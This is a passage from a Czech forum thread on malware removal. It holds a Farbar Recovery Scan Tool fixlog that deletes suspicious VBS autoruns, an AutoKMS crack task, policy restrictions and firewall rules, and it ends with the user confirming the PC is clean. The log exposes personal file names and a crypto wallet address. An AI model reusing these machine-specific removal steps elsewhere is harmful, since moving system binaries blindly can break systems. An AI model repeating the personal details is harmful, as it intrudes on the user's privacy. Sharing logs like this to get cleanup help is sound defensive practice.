AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Plná moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\priloha1.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\readme.txt:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Spořitelna.png:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Telegram Desktop:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Ulozto:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\wordpress:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\__MACOSX:com.dropbox.attrs [54]
FirewallRules: [UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-17] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Value] => C:\Program Files\MSBuild\Microsoft\sigoren.vbe [1223 2020-02-25] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Microsoft Software Essentials] => C:\ProgramData\Microsoft Essentials\Software Essentials.vbs [12320 2020-03-16] () [File not signed]
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
Task: {114D61BE-723E-4720-9A0D-15FEB326AC4B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {CD7FA012-E446-4088-B57D-E33EE8969426} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {DEA268E2-12DD-4984-AB28-F8F89AFCFFCA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {EEA50510-8C7D-45F8-BEF4-240855B8A812} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
C:\WINDOWS\AutoKMS

EmptyTemp:
Hosts:
End
*****************

Processes closed successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Pending) => subkey with invalid name -> removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Synced) => subkey with invalid name -> removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Syncing) => subkey with invalid name -> removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw => removed successfully
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Pending) => subkey with invalid name -> removed successfully
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Synced) => subkey with invalid name -> removed successfully
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Syncing) => subkey with invalid name -> removed successfully
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\MEGA (Context menu) => removed successfully
HKLM\Software\Classes\Drive\ShellEx\ContextMenuHandlers\MEGA (Context menu) => removed successfully
HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\MEGA (Context menu) => removed successfully
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\MEGA (Context menu) => removed successfully
C:\ProgramData\TEMP => ":0888F409" ADS removed successfully
C:\ProgramData\TEMP => ":3440EB47" ADS removed successfully
C:\ProgramData\TEMP => ":66633281" ADS removed successfully
C:\ProgramData\TEMP => ":93433455" ADS removed successfully
C:\Users\IRENA-PC\Downloads => ":com.dropbox.attrs" ADS could not remove.
C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\102394978_1.jpg => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\ChromeSetup.exe => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\cpg15x => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\desktop (New).ini => ":com.dropbox.attrs" ADS could not remove.
C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\index.php => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\JDownloader => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4 => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Mall rádio.PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\PA2018040002.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\plna_moc.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Plná moc.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\priloha1.PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\readme.txt => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Spořitelna.png => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Telegram Desktop => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Ulozto => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\wordpress => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\__MACOSX => ":com.dropbox.attrs" ADS removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe" => removed successfully
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe => moved successfully
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\SunJavaUpdateSched" => removed successfully
"HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Value" => removed successfully
"HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Microsoft Software Essentials" => removed successfully
C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully
C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
C:\ProgramData\NTUSER.pol => moved successfully
HKLM\SOFTWARE\Policies\Mozilla => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{114D61BE-723E-4720-9A0D-15FEB326AC4B}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{114D61BE-723E-4720-9A0D-15FEB326AC4B}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineUA" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CD7FA012-E446-4088-B57D-E33EE8969426}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CD7FA012-E446-4088-B57D-E33EE8969426}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{DEA268E2-12DD-4984-AB28-F8F89AFCFFCA}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DEA268E2-12DD-4984-AB28-F8F89AFCFFCA}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineCore" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{EEA50510-8C7D-45F8-BEF4-240855B8A812}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EEA50510-8C7D-45F8-BEF4-240855B8A812}" => removed successfully
C:\WINDOWS\System32\Tasks\AutoKMS => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoKMS" => removed successfully
"C:\WINDOWS\AutoKMS" => not found
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 10772480 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 221777092 B
Java, Flash, Steam htmlcache => 1080 B
Windows/system/drivers => 209262 B
Edge => 33792 B
Chrome => 166347126 B
Brave => 322395 B
Firefox => 10614505 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 34550 B
IRENA-PC => 7177522 B

RecycleBin => 0 B
EmptyTemp: => 398 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 20:16:47 ====

Re: Prosím o kontrolu logu

Napsal: 20 led 2021 20:53
od Rudy
Smazáno. Nastala nějaká změna?

Re: Prosím o kontrolu logu

Napsal: 20 led 2021 21:27
od chenny
PC vypadá v pořádku. Moc děkuji za pomoc a za váš čas :)
Všechny časy jsou v UTC+01:00
Stránka 1 z 2

Založeno na phpBB® Forum Software © phpBB Limited

Český překlad – phpBB.cz